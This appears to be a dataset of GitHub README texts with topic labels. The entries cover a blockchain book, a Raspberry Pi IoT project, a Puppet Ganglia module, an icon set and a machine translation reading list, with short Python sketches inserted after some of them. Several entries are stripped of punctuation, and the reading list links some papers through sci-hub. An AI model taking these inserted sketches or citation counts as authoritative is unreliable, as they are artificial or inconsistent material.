the hashing algorithm used to secure data mine new blocks create new transactions and store the transactions in blocks if you feel this book is for you get your copy https www amazon com dp 1789618827 today a href https www packtpub com utm source github utm medium banner utm campaign githubbanner img src https raw githubusercontent com packtpublishing github master github png alt https www packtpub com border 5 a instructions and navigations all of the code is organized into folders for example chapter02 the code will look like the following 
blockchain prototype createnewblock function following is what you need for this book learn blockchain programming with javascript is for javascript developers who wish to learn about blockchain programming or build their own blockchain using javascript frameworks with the following software and hardware list you can run all code files present in the book chapter 1 8 software and hardware list chapter software required os required 1 8 any text editor and node js windows mac os x related products other books you may enjoy learn bitcoin and blockchain packt https www packtpub com big data and business intelligence learn bitcoin and blockchain utm source github utm medium repository utm campaign 9781789536133 amazon https www amazon com dp 1789536138 building enterprise javascript applications packt https www packtpub com web development building enterprise javascript applications utm source github utm medium repository utm campaign 9781788477321 amazon https www amazon com dp 1788477324 get to know the author eric traub currently works as a software engineer in new york city he has extensive experience working as a teacher and instructing people in a variety of different subjects he changed his career from teaching to software engineering because of the excitement it brings to him and the passion that he has for it he is now lucky enough to have the opportunity to combine both of these passions software engineering and teaching suggestions and feedback click here https docs google com forms d e 1faipqlsdy7datc6qmel81fiuuymz0wy9vh1jhkvpy57oimekgqib ow viewform if you have any feedback or suggestions download a free pdf i if you have already purchased a print or kindle version of this book you can get a drm free pdf version at no cost br simply click on the link to claim your free pdf i p align center a href https packt link free ebook 9781789618822 https packt link free ebook 9781789618822 a p
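The book builds these pieces (creating new blocks, hashing them, securing the chain with a proof of work) in JavaScript with Node.js. As a taste of the core idea, here is a hedged Python sketch of the same mechanism; it is not the book's code, and the difficulty here is deliberately low so mining finishes instantly.

```python
# Sketch of the core blockchain mechanism the book builds in JavaScript:
# hash a block's contents, search for a nonce that satisfies a proof of
# work, and append the mined block to the chain. Not the book's code.

import hashlib, json

def hash_block(prev_hash, data, nonce):
    payload = prev_hash + str(nonce) + json.dumps(data, sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()

def proof_of_work(prev_hash, data, difficulty="0000"):
    nonce = 0  # increment until the hash starts with the difficulty prefix
    while not hash_block(prev_hash, data, nonce).startswith(difficulty):
        nonce += 1
    return nonce

def create_new_block(chain, data, difficulty="0000"):
    prev_hash = chain[-1]["hash"] if chain else "0"
    nonce = proof_of_work(prev_hash, data, difficulty)
    block = {"index": len(chain) + 1, "data": data, "nonce": nonce,
             "prev_hash": prev_hash,
             "hash": hash_block(prev_hash, data, nonce)}
    chain.append(block)
    return block

chain = []
block = create_new_block(chain, {"amount": 10}, difficulty="00")
assert block["hash"].startswith("00")   # proof of work satisfied
```

Tampering with `data` after mining changes the recomputed hash, which is what makes the chain tamper-evident.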
blockchain
IoT
iot internet of things based home automation project using ibm iotf platform please follow the tutorial at http diyhacking com raspberry pi home automation ibm bluemix this repository consists of two scripts client py this python script runs on the raspberry pi it accepts command from the server and pushes data from a pir motion sensor to the ibm iotf platform server py this python script runs on the web server or laptop and issues commands that control the gpio pins on the raspberry pi before running this script on the server you should install the corresponding packages for ibm iotf the instructions can be found here https docs internetofthings ibmcloud com libraries python html
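client.py pushes PIR motion readings from the Raspberry Pi to the IBM IoTF platform. The following is a hypothetical, network-free sketch of that loop: poll a (simulated) GPIO pin and build the JSON event payload that would be published; the actual GPIO and IoTF client calls are omitted rather than guessed at.

```python
# Hypothetical, network-free sketch of the client.py loop described
# above: poll a (simulated) PIR pin on the Raspberry Pi and build the
# JSON event payload that would be pushed to the IBM IoTF platform.
# The real GPIO read and IoTF publish calls are omitted, not guessed.

import json, time

def read_pir(samples):
    # stand-in for reading the PIR motion sensor's GPIO pin
    return samples.pop(0)

def motion_events(samples):
    events, prev = [], 0
    while samples:
        state = read_pir(samples)
        if state and not prev:   # rising edge: motion just started
            events.append(json.dumps({"d": {"motion": 1,
                                            "ts": int(time.time())}}))
        prev = state
    return events

# two rising edges in this sample stream => two events
assert len(motion_events([0, 1, 1, 0, 1])) == 2
```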
server
puppet-ganglia
puppet ganglia module ci https github com jhoblitt puppet ganglia actions workflows ci yml badge svg https github com jhoblitt puppet ganglia actions workflows ci yml markdownlint https github com jhoblitt puppet ganglia actions workflows markdownlint yaml badge svg https github com jhoblitt puppet ganglia actions workflows markdownlint yaml shellcheck https github com jhoblitt puppet ganglia actions workflows shellcheck yaml badge svg https github com jhoblitt puppet ganglia actions workflows shellcheck yaml yamllint https github com jhoblitt puppet ganglia actions workflows yamllint yaml badge svg https github com jhoblitt puppet ganglia actions workflows yamllint yaml table of contents 1 overview overview 2 description description 3 usage usage examples examples classes classes ganglia gmond gangliagmond ganglia gmetad gangliagmetad ganglia web gangliaweb 4 limitations limitations puppet version compatibility puppet version compatibility osfamily redhat and epel packages osfamily redhat and epel packages 5 versioning versioning 6 support support 7 contributing contributing 8 see also see also overview manages ganglia gmond gmetad daemons web front end description this is a puppet module for installation and configuration of the ganglia http ganglia sourceforge net gmond gmetad daemons web front end usage examples puppet unicast udp recv channel port 8649 bind localhost port 8649 bind 0 0 0 0 udp send channel port 8649 host test1 example org ttl 2 port 8649 host test2 example org ttl 2 bind hostname yes host test3 example org ttl 1 tcp accept channel port 8649 multicast udp recv channel mcast join 239 2 11 71 mcast if eth0 port 8649 ttl 1 udp send channel mcast join 239 2 11 71 port 8649 bind 239 2 11 71 tcp accept channel port 8649 gmond package name ganglia gmond ganglia gmond python class ganglia gmond globals deaf yes globals host dmax 691200 globals send metadata interval 60 globals override hostname web example org cluster name example grid cluster owner
acme inc cluster latlong n32 2332147 w110 9481163 cluster url www example org host location example computer room udp recv channel udp recv channel udp send channel udp send channel tcp accept channel tcp accept channel gmond package name gmond package name puppet clusters name test address test1 example org test2 example org rras cf average xff 0 5 steps 1 rows 5856 cf average xff 0 5 steps 4 rows 20160 cf average xff 0 5 steps 40 rows 52704 class ganglia gmetad clusters clusters gridname my grid rras rras all trusted false trusted hosts puppet class ganglia web ganglia ip 192 168 0 1 ganglia port 8652 classes ganglia gmond this class manages the configurtion of the ganglia gmond daemon puppet defaults class ganglia gmond globals deaf no globals host dmax 0 globals send metadata interval 300 globals override hostname undef cluster name unspecified cluster owner unspecified cluster latlong unspecified cluster url unspecified host location unspecified udp send channel mcast join 239 2 11 71 port 8649 ttl 1 udp recv channel mcast join 239 2 11 71 port 8649 bind 239 2 11 71 tcp accept channel port 8659 gmond package name ganglia params gmond package name globals deaf string defaults to no globals host dmax string defaults to 0 globals send metadata interval string defaults to 300 globals override hostname string defaults to undef cluster name string defaults to unspecified cluster owner string defaults to unspecified cluster latlong string defaults to unspecified cluster url string defaults to unspecified host location string defaults to unspecified udp send channel array of hash defaults to puppet mcast join 239 2 11 71 port 8649 ttl 1 supported hash keys are all optional bind hostname mcast join mcast if host port ttl udp recv channel array of hash defaults to puppet mcast join 239 2 11 71 port 8649 bind 239 2 11 71 supported hash keys are all optional mcast join mcast if port bind family tcp accept channel array of hash defaults to puppet port 8659 supported hash 
keys are all optional port family gmond package name string or array defaults to ganglia params gmond package name ganglia gmetad install and configure the ganglia gmetad daemon puppet defaults class ganglia gmetad all trusted false clusters name my cluster address localhost gridname undef rras ganglia params rras trusted hosts gmetad package name ganglia params gmetad package name gmetad service name ganglia params gmetad service name gmetad service config ganglia params gmetad service config gmetad user ganglia params gmetad user gmetad case sensitive hostnames ganglia params gmetad case sensitive hostnames all trusted boolean defaults to false if set to true will allow any host to query ganglia data via the xml query port corresponds to the all trusted field in gmetad conf clusters array of hash defaults to puppet name my cluster address localhost supported hash keys are name required polling interval optional address may be a string or array of string gridname string defaults to undef rras array of hash defaults to puppet cf average xff 0 5 steps 1 rows 5856 cf average xff 0 5 steps 4 rows 20160 cf average xff 0 5 steps 40 rows 52704 supported hash keys all keys are required are cf consolidation function cf can be average min max last xff xfiles factor xff defines what part of a consolidation interval may be made up from unknown data while the consolidated value is still regarded as known it is given as the ratio of allowed unknown pdps to the number of pdps in the interval thus it ranges from 0 to 1 exclusive steps steps defines how many of these primary data points are used to build a consolidated data point which then goes into the archive rows rows defines how many generations of data values are kept in an rra obviously this has to be greater than zero trusted hosts array of strings defaults to each string matches a hostname that is allowed to query ganglia data via the xml query port corresponds to the all trusted field in gmetad conf gmetad package name 
string defaults to ganglia params gmetad package name gmetad service name string defaults to ganglia params gmetad service name gmetad service config string defaults to ganglia params gmetad service config gmetad user string defaults to ganglia params gmetad user gmetad case sensitive hostnames integer defaults to ganglia params gmetad case sensitive hostnames accepted values are 0 or 1 ganglia web install and configure the ganglia web front end puppet defaults class ganglia web ganglia ip 127 0 0 1 ganglia port 8652 ganglia ip string defaults to 127 0 0 1 ganglia port string or integer defaults to integer 8652 passing a string to ganglia port is deprecated please use an integer value limitations puppet version compatibility versions puppet 2 7 puppet 3 x puppet 4 x puppet 5 x puppet 6 x 1 x yes yes no no no 2 x no yes yes no no 3 x no no no yes yes osfamily redhat and epel packages as of 2012 11 16 the stable epel repos for el5 and el6 contain respectively packages for ganglia 3 0 7 and 3 1 7 the ganglia udp protocol for communication between gmond daemons changed incompatibly between 3 0 x and 3 1 x however the tcp based protocol gmetad uses to poll gmond agents has remained compatible if it s desirable to stick with the epel packages a possible way of dealing with this is divide a group of hosts into two clusters based on lsbmajdistrelease which should imply gmond version without having to install a custom fact the example below divides the previous mycluster into mycluster el5 and mycluster el6 note that you will also have to configure gmetad to pull a gmond agent from each of these new clusters puppet udp recv channel port 8649 bind localhost port 8649 bind 0 0 0 0 case lsbmajdistrelease 5 epel for el5 x has 3 0 x which will not work with gmond in 3 1 x udp send channel port 8649 host gmond 3 0 host1 example org ttl 2 port 8649 host gmond 3 0 host2 example org ttl 2 cluster name mycluster el5 6 default epel for el6 x has 3 1 x udp send channel port 8649 host 
gmond 3 1 host1 example org ttl 2 port 8649 host gmond 3 1 host2 example org ttl 2 cluster name mycluster el6 tcp accept channel port 8649 class ganglia gmond cluster name example grid cluster owner acme inc cluster latlong n32 2332147 w110 9481163 cluster url www example org host location example computer room udp recv channel udp recv channel udp send channel udp send channel tcp accept channel tcp accept channel versioning this module is versioned according to the semantic versioning 2 0 0 http semver org spec v2 0 0 html specification support please log tickets and issues at github https github com jhoblitt puppet ganglia issues contributing 1 fork it on github 2 make a local clone of your fork 3 create a topic branch eg feature mousetrap 4 make commit changes commit messages should be in imperative tense http git scm com book ch5 2 html check that linter warnings or errors are not introduced pdk validate a check that rspec unit tests are not broken and coverage is added for new features pdk test unit documentation of api features is updated as appropriate in the readme if present beaker acceptance tests should be run and potentially updated pdk bundle exec rake beaker 5 when the feature is complete rebase squash the branch history as necessary to remove fix typo oops whitespace and other trivial commits 6 push the topic branch to github 7 open a pull request pr from the topic branch onto parent repo s master branch see also ganglia http ganglia sourceforge net
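The retention arithmetic behind the default `rras` values can be sketched in Python: one consolidated point covers `steps` base intervals, and the archive keeps `rows` of them. The 15-second base RRD step below is an assumption (a common gmetad polling interval), not something this module configures.

```python
# Sketch: how long each default RRA retains data, assuming a 15 s base RRD
# step (an assumed gmetad polling interval, not set by this Puppet module).
BASE_STEP_S = 15

rras = [
    {"cf": "AVERAGE", "xff": 0.5, "steps": 1,  "rows": 5856},
    {"cf": "AVERAGE", "xff": 0.5, "steps": 4,  "rows": 20160},
    {"cf": "AVERAGE", "xff": 0.5, "steps": 40, "rows": 52704},
]

def retention_days(rra, base_step_s=BASE_STEP_S):
    """One consolidated point spans steps * base_step_s seconds; the
    archive keeps rows of those points."""
    seconds = rra["steps"] * base_step_s * rra["rows"]
    return seconds / 86400  # seconds per day

for rra in rras:
    point_span = rra["steps"] * BASE_STEP_S
    print(f"steps={rra['steps']:>2} rows={rra['rows']:>5} "
          f"-> one point per {point_span:>3}s, "
          f"~{retention_days(rra):.1f} days retained")
```

Under that assumed 15 s step, the three archives work out to roughly one day at full resolution, two weeks at one-minute resolution, and a year at ten-minute resolution.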
front_end
# system-uicons
## What is System UIcons?

System UIcons is a collection of open source icons designed with products and systems in mind. Each icon is on a 21x21 grid. Use the icons how you want, for free and without any attribution.

[https://systemuicons.com](https://systemuicons.com)

## Looking for a React library of System UIcons?

[Martin Zlámal](https://github.com/mrtnzlml) has created an awesome open source community icon group over at [system-uicons-react](https://github.com/adeira/icons).
iconset icons
os
# MT-Reading-List
# Machine Translation Reading List

This is a machine translation reading list maintained by the Tsinghua Natural Language Processing Group.

The past three decades have witnessed the rapid development of machine translation, especially for data-driven approaches such as statistical machine translation (SMT) and neural machine translation (NMT). Due to the dominance of NMT at the present time, priority is given to collecting important, up-to-date NMT papers; the [Edinburgh/JHU MT research survey wiki](http://www.statmt.org/survey) has good coverage of older papers and a brief description for each sub-topic of MT. Our list is still incomplete and the categorization might be inappropriate. We will keep adding papers and improving the list. Any suggestions are welcome!

* [10 Must Reads](#10-must-reads)
* [Tutorials and Surveys](#surveys)
* [Statistical Machine Translation](#statistical-machine-translation)
    * [Word-based Models](#word-based-models)
    * [Phrase-based Models](#phrase-based-models)
    * [Syntax-based Models](#syntax-based-models)
    * [Discriminative Training](#discriminative-training)
    * [System Combination](#system-combination)
    * [Human-centered SMT](#human-centered-smt)
        * [Interactive SMT](#interactive)
        * [Adaptation](#adaptation-smt)
    * [Evaluation](#evaluation)
* [Neural Machine Translation](#neural-machine-translation)
    * [Model Architecture](#model-architecture)
    * [Attention Mechanism](#attention-mechanism)
    * [Open Vocabulary](#open-vocabulary)
    * [Training Objectives and Frameworks](#training)
    * [Decoding](#decoding)
    * [Low-resource Language Translation](#low-resource-language-translation)
        * [Semi-supervised Learning](#semi-supervised)
        * [Unsupervised Learning](#unsupervised)
        * [Pivot-based Methods](#pivot-based)
        * [Data Augmentation](#data-augmentation)
        * [Data Selection](#data-selection)
        * [Transfer Learning](#transfer-learning)
        * [Meta Learning](#meta-learning)
    * [Multilingual Machine Translation](#multilingual)
    * [Prior Knowledge Integration](#prior-knowledge-integration)
        * [Word/Phrase Constraints](#word-phrase-constraints)
        * [Syntactic/Semantic Constraints](#syntactic-semantic-constraints)
        * [Coverage Constraints](#coverage-constraints)
    * [Document-level Translation](#document-level-translation)
    * [Robustness](#robustness)
    * [Interpretability](#interpretability)
    * [Linguistic Interpretation](#linguistic-interpretation)
    * [Fairness and Diversity](#fairness-and-diversity)
    * [Efficiency](#efficiency)
    * [Non-Autoregressive Translation](#nat)
    * [Speech Translation and Simultaneous Translation](#speech-translation-and-simultaneous-translation)
    * [Multi-modality](#multi-modality)
    * [Ensemble and Reranking](#ensemble-reranking)
    * [Pre-training](#pre-training)
    * [Domain Adaptation](#domain-adaptation)
    * [Quality Estimation](#quality-estimation)
    * [Human-centered NMT](#human-centered)
        * [Interactive NMT](#interactive-nmt)
        * [Automatic Post-editing](#ape)
    * [Poetry Translation](#poetry-translation)
    * [Eco-friendly](#eco-friendly)
    * [Compositional Generalization](#compositional-generalization)
    * [Endangered Language Revitalization](#endangered)
    * [Word Translation (Bilingual Lexicon Induction)](#word-translation)
* [WMT Winners](#wmt-winners)
    * [WMT 2019](#wmt19)
    * [WMT 2018](#wmt18)
    * [WMT 2017](#wmt17)
    * [WMT 2016](#wmt16)

<h2 id="10-must-reads">10 Must Reads</h2>

* Peter E. Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and Robert L. Mercer. 1993. [The Mathematics of Statistical Machine Translation: Parameter Estimation](http://aclweb.org/anthology/J93-2003). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=2259057253133260714&as_sdt=2005&sciodt=0,5&hl=en): 5,218)
* Kishore Papineni, Salim Roukos, Todd Ward, and Wei-Jing Zhu. 2002. [BLEU: a Method for Automatic Evaluation of Machine Translation](http://aclweb.org/anthology/P02-1040). In *Proceedings of ACL 2002*. ([Citation](https://scholar.google.com/scholar?cites=9019091454858686906&as_sdt=2005&sciodt=0,5&hl=en): 10,700)
* Philipp Koehn, Franz J. Och, and Daniel Marcu. 2003. [Statistical Phrase-Based Translation](http://aclweb.org/anthology/N03-1017). In *Proceedings of NAACL 2003*. ([Citation](https://scholar.google.com/scholar?cites=11796378766060939113&as_sdt=2005&sciodt=0,5&hl=en): 3,713)
* Franz Josef Och. 2003. [Minimum Error Rate Training in Statistical Machine Translation](http://aclweb.org/anthology/P03-1021). In *Proceedings of ACL 2003*. ([Citation](https://scholar.google.com/scholar?cites=15358949031331886708&as_sdt=2005&sciodt=0,5&hl=en): 3,115)
* David Chiang. 2007. [Hierarchical Phrase-Based Translation](http://aclweb.org/anthology/J07-2003). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=17074501474509484516&as_sdt=2005&sciodt=0,5&hl=en): 1,235)
* Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. [Sequence to Sequence Learning with Neural Networks](https://papers.nips.cc/paper/5346-sequence-to-sequence-learning-with-neural-networks.pdf). In *Proceedings of NIPS 2014*. ([Citation](https://scholar.google.com/scholar?cites=13133880703797056141&as_sdt=2005&sciodt=0,5&hl=en): 9,432)
* Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. [Neural Machine Translation by Jointly Learning to Align and Translate](https://arxiv.org/pdf/1409.0473.pdf). In *Proceedings of ICLR 2015*. ([Citation](https://scholar.google.com/scholar?cites=9430221802571417838&as_sdt=2005&sciodt=0,5&hl=en): 10,479)
* Diederik P. Kingma and Jimmy Ba. 2015. [Adam: A Method for Stochastic Optimization](https://arxiv.org/pdf/1412.6980). In *Proceedings of ICLR 2015*. ([Citation](https://scholar.google.com/scholar?cites=16194105527543080940&as_sdt=2005&sciodt=0,5&hl=en): 37,480)
* Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. [Neural Machine Translation of Rare Words with Subword Units](https://arxiv.org/pdf/1508.07909.pdf). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com/scholar?cites=1307964014330144942&as_sdt=2005&sciodt=0,5&hl=en): 1,679)
* Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. [Attention is All You Need](https://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf). In *Proceedings of NIPS 2017*. ([Citation](https://scholar.google.com/scholar?cites=2960712678066186980&as_sdt=2005&sciodt=0,5&hl=en): 6,112)

<h2 id="surveys">Tutorials and Surveys</h2>

* Zhixing Tan, Shuo Wang, Zonghan Yang, Gang Chen, Xuancheng Huang, Maosong Sun, and Yang Liu. 2020. [Neural Machine Translation: A Review of Methods, Resources, and Tools](https://arxiv.org/abs/2012.15515). *AI Open*.
* Felix Stahlberg. 2020. [Neural Machine Translation: A Review and Survey](https://arxiv.org/abs/1912.02047). *Journal of Artificial Intelligence Research*.
* Philipp Koehn and Rebecca Knowles. 2017. [Six Challenges for Neural Machine Translation](http://www.aclweb.org/anthology/W17-3204). In *Proceedings of the First Workshop on Neural Machine Translation*.
* Philipp Koehn. 2017. [Neural Machine Translation](https://arxiv.org/abs/1709.07809). arXiv:1709.07809.
* Oriol Vinyals and Navdeep Jaitly. 2017. [Seq2Seq ICML Tutorial](https://docs.google.com/presentation/d/1quimxeepef5ekrhc2usqaojrc4qnx6-komdztbmbwjk/present#slide=id.p). ICML 2017 Tutorial.
* Raj Dabre, Chenhui Chu, and Anoop Kunchukuttan. 2020. [A Survey of Multilingual Neural Machine Translation](https://doi.org/10.1145/3406095). *ACM Computing Surveys* 53, 5, Article 99 (October 2020). [Tutorial on Multilingual Neural Machine Translation](https://github.com/anoopkunchukuttan/multinmt-tutorial-coling2020) at COLING 2020.
* Graham Neubig. 2017. [Neural Machine Translation and Sequence-to-sequence Models: A Tutorial](https://arxiv.org/pdf/1703.01619.pdf). arXiv:1703.01619. ([Citation](https://scholar.google.com/scholar?cites=17621873290135947085&as_sdt=2005&sciodt=0,5&hl=en): 45)
* Thang Luong, Kyunghyun Cho, and Christopher Manning. 2016. [Neural Machine Translation](https://nlp.stanford.edu/projects/nmt/Luong-Cho-Manning-NMT-ACL2016-v4.pdf). ACL 2016 Tutorial.
* Adam Lopez. 2008. [Statistical Machine Translation](http://delivery.acm.org/10.1145/1390000/1380586/a8-lopez.pdf). *ACM Computing Surveys*.
* Philipp Koehn. 2006. [Statistical Machine Translation: the basic, the novel, and the speculative](http://homepages.inf.ed.ac.uk/pkoehn/publications/tutorial2006.pdf). EACL 2006 Tutorial.

<h2 id="statistical-machine-translation">Statistical Machine Translation</h2>

<h3 id="word-based-models">Word-based Models</h3>

* Peter E. Brown, Stephen A. Della Pietra, Vincent J. Della Pietra, and Robert L. Mercer. 1993. [The Mathematics of Statistical Machine Translation: Parameter Estimation](http://aclweb.org/anthology/J93-2003). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=2259057253133260714&as_sdt=2005&sciodt=0,5&hl=en): 4,965)
* Stephan Vogel, Hermann Ney, and Christoph Tillmann. 1996. [HMM-Based Word Alignment in Statistical Translation](http://aclweb.org/anthology/C96-2141). In *Proceedings of COLING 1996*. ([Citation](https://scholar.google.com/scholar?cites=6742027174667056165&as_sdt=2005&sciodt=0,5&hl=en): 940)
* Franz Josef Och and Hermann Ney. 2003. [A Systematic Comparison of Various Statistical Alignment Models](http://aclweb.org/anthology/J03-1002). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=7906670690027479083&as_sdt=2005&sciodt=0,5&hl=en): 3,980)
* Percy Liang, Ben Taskar, and Dan Klein. 2006. [Alignment by Agreement](https://cs.stanford.edu/~pliang/papers/alignment-naacl2006.pdf). In *Proceedings of NAACL 2006*. ([Citation](https://scholar.google.com/scholar?cites=10766838746666771394&as_sdt=2005&sciodt=0,5&hl=en): 452)
* Chris Dyer, Victor Chahuneau, and Noah A. Smith. 2013. [A Simple, Fast, and Effective Reparameterization of IBM Model 2](http://www.aclweb.org/anthology/N13-1073). In *Proceedings of NAACL 2013*. ([Citation](https://scholar.google.com/scholar?cites=13560076980956479370&as_sdt=2005&sciodt=0,5&hl=en): 310)

<h3 id="phrase-based-models">Phrase-based Models</h3>

* Philipp Koehn, Franz J. Och, and Daniel Marcu. 2003. [Statistical Phrase-Based Translation](http://aclweb.org/anthology/N03-1017). In *Proceedings of NAACL 2003*. ([Citation](https://scholar.google.com/scholar?cites=11796378766060939113&as_sdt=2005&sciodt=0,5&hl=en): 3,516)
* Michel Galley and Christopher D. Manning. 2008. [A Simple and Effective Hierarchical Phrase Reordering Model](https://nlp.stanford.edu/pubs/emnlp08-lexorder.pdf). In *Proceedings of EMNLP 2008*. ([Citation](https://scholar.google.com/scholar?cites=14572547803642015856&as_sdt=2005&sciodt=0,5&hl=en): 275)

<h3 id="syntax-based-models">Syntax-based Models</h3>

* Dekai Wu. 1997. [Stochastic Inversion Transduction Grammars and Bilingual Parsing of Parallel Corpora](http://aclweb.org/anthology/J97-3002). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=7926725626202301933&as_sdt=2005&sciodt=0,5&hl=en): 1,009)
* Michel Galley, Jonathan Graehl, Kevin Knight, Daniel Marcu, Steve DeNeefe, Wei Wang, and Ignacio Thayer. 2006. [Scalable Inference and Training of Context-Rich Syntactic Translation Models](http://aclweb.org/anthology/P06-1121). In *Proceedings of COLING/ACL 2006*. ([Citation](https://scholar.google.com/scholar?cites=2650671041278094269&as_sdt=2005&sciodt=0,5&hl=en): 475)
* Yang Liu, Qun Liu, and Shouxun Lin. 2006. [Tree-to-String Alignment Template for Statistical Machine Translation](http://aclweb.org/anthology/P06-1077). In *Proceedings of COLING/ACL 2006*. ([Citation](https://scholar.google.com/scholar?cites=8683308453323663525&as_sdt=2005&sciodt=0,5&hl=en): 391)
* Deyi Xiong, Qun Liu, and Shouxun Lin. 2006. [Maximum Entropy Based Phrase Reordering Model for Statistical Machine Translation](https://aclanthology.info/pdf/P/P06/P06-1066.pdf). In *Proceedings of COLING/ACL 2006*. ([Citation](https://scholar.google.com/scholar?cites=11896300896063367737&as_sdt=2005&sciodt=0,5&hl=en): 299)
* David Chiang. 2007. [Hierarchical Phrase-Based Translation](http://aclweb.org/anthology/J07-2003). *Computational Linguistics*. ([Citation](https://scholar.google.com/scholar?cites=17074501474509484516&as_sdt=2005&sciodt=0,5&hl=en): 1,192)
* Liang Huang and David Chiang. 2007. [Forest Rescoring: Faster Decoding with Integrated Language Models](http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.88.5058&rep=rep1&type=pdf). In *Proceedings of ACL 2007*. ([Citation](https://scholar.google.com/scholar?cites=2826188279623417237&as_sdt=2005&sciodt=0,5&hl=en): 280)
* Haitao Mi, Liang Huang, and Qun Liu. 2008. [Forest-Based Translation](http://aclweb.org/anthology/P08-1023). In *Proceedings of ACL 2008*. ([Citation](https://scholar.google.com/scholar?cites=11263493281241243162&as_sdt=2005&sciodt=0,5&hl=en): 239)
* Min Zhang, Hongfei Jiang, Aiti Aw, Haizhou Li, Chew Lim Tan, and Sheng Li. 2008. [A Tree Sequence Alignment-based Tree-to-Tree Translation Model](http://www.aclweb.org/anthology/P08-1064). In *Proceedings of ACL 2008*. ([Citation](https://scholar.google.com/scholar?cites=4828105603038412208&as_sdt=2005&sciodt=0,5&hl=en): 124)
* Libin Shen, Jinxi Xu, and Ralph Weischedel. 2008. [A New String-to-Dependency Machine Translation Algorithm with a Target Dependency Language Model](http://aclweb.org/anthology/P08-1066). In *Proceedings of ACL 2008*. ([Citation](https://scholar.google.com/scholar?cites=15082517325172081801&as_sdt=2005&sciodt=0,5&hl=en): 278)
* Haitao Mi and Liang Huang. 2008. [Forest-based Translation Rule Extraction](http://aclweb.org/anthology/D08-1022). In *Proceedings of EMNLP 2008*. ([Citation](https://scholar.google.com/scholar?cites=11263493281241243162&as_sdt=2005&sciodt=0,5&hl=en): 239)
* Yang Liu, Yajuan Lü, and Qun Liu. 2009. [Improving Tree-to-Tree Translation with Packed Forests](http://aclweb.org/anthology/P09-1063). In *Proceedings of ACL/IJCNLP 2009*. ([Citation](https://scholar.google.com/scholar?cites=3907324274083528908&as_sdt=2005&sciodt=0,5&hl=en): 93)
* David Chiang. 2010. [Learning to Translate with Source and Target Syntax](http://aclweb.org/anthology/P10-1146). In *Proceedings of ACL 2010*. ([Citation](https://scholar.google.com/scholar?cites=18270412258769590027&as_sdt=2005&sciodt=0,5&hl=en): 118)

<h3 id="discriminative-training">Discriminative Training</h3>

* Franz Josef Och and Hermann Ney. 2002. [Discriminative Training and Maximum Entropy Models for Statistical Machine Translation](http://aclweb.org/anthology/P02-1038). In *Proceedings of ACL 2002*. ([Citation](https://scholar.google.com/scholar?cites=2845378992177918439&as_sdt=2005&sciodt=0,5&hl=en): 1,258)
* Franz Josef Och. 2003. [Minimum Error Rate Training in Statistical Machine Translation](http://aclweb.org/anthology/P03-1021). In *Proceedings of ACL 2003*. ([Citation](https://scholar.google.com/scholar?cites=15358949031331886708&as_sdt=2005&sciodt=0,5&hl=en): 2,984)
* Taro Watanabe, Jun Suzuki, Hajime Tsukada, and Hideki Isozaki. 2007. [Online Large-Margin Training for Statistical Machine Translation](http://aclweb.org/anthology/D07-1080). In *Proceedings of EMNLP-CoNLL 2007*. ([Citation](https://scholar.google.com/scholar?cites=6690339336101573833&as_sdt=2005&sciodt=0,5&hl=en): 197)
* David Chiang, Kevin Knight, and Wei Wang. 2009. [11,001 New Features for Statistical Machine Translation](http://aclweb.org/anthology/N09-1025). In *Proceedings of NAACL 2009*. ([Citation](https://scholar.google.com/scholar?cites=14062409519286340147&as_sdt=2005&sciodt=0,5&hl=en): 251)

<h3 id="system-combination">System Combination</h3>

* Antti-Veikko Rosti, Spyros Matsoukas, and Richard Schwartz. 2007. [Improved Word-Level System Combination for Machine Translation](http://aclweb.org/anthology/P07-1040). In *Proceedings of ACL 2007*. ([Citation](https://scholar.google.com/scholar?cites=13310846375895519088&as_sdt=2005&sciodt=0,5&hl=en): 144)
* Xiaodong He, Mei Yang, Jianfeng Gao, Patrick Nguyen, and Robert Moore. 2008. [Indirect-HMM-based Hypothesis Alignment for Combining Outputs from Machine Translation Systems](http://aclweb.org/anthology/D08-1011). In *Proceedings of EMNLP 2008*. ([Citation](https://scholar.google.com/scholar?cites=5843300493006970528&as_sdt=2005&sciodt=0,5&hl=en): 96)

<h3 id="human-centered-smt">Human-centered SMT</h3>

<h4 id="interactive">Interactive SMT</h4>

* George Foster, Pierre Isabelle, and Pierre Plamondon. 1997. [Target-Text Mediated Interactive Machine Translation](https://sci-hub.tw/10.2307/40009035). *Machine Translation*. ([Citation](https://scholar.google.com/scholar?cites=17084037882064721827&as_sdt=2005&sciodt=0,5): 116)
* Philippe Langlais, Guy Lapalme, and Marie Lorange. 2002. [TransType: Development-Evaluation Cycles to Boost Translator's Productivity](https://sci-hub.tw/10.2307/40007093). *Machine Translation*. ([Citation](https://scholar.google.com/scholar?cites=7892155138946158318&as_sdt=2005&sciodt=0,5): 74)
* Jesús Tomás and Francisco Casacuberta. 2006. [Statistical Phrase-Based Models for Interactive Computer-Assisted Translation](http://aclweb.org/anthology/P06-2107). In *Proceedings of COLING/ACL*. ([Citation](https://scholar.google.com/scholar?cites=2242179645100420046&as_sdt=2005&sciodt=0,5): 31)
* Enrique Vidal, Francisco Casacuberta, Luis Rodríguez-Ruiz, Jorge Civera, and Carlos D. Martínez-Hinarejos. 2006. [Computer-Assisted Translation Using Speech Recognition](https://ieeexplore.ieee.org/document/1621206). *IEEE Transactions on Audio, Speech, and Language Processing*. ([Citation](https://scholar.google.com/scholar?cites=32625184311110830&as_sdt=2005&sciodt=0,5): 62)
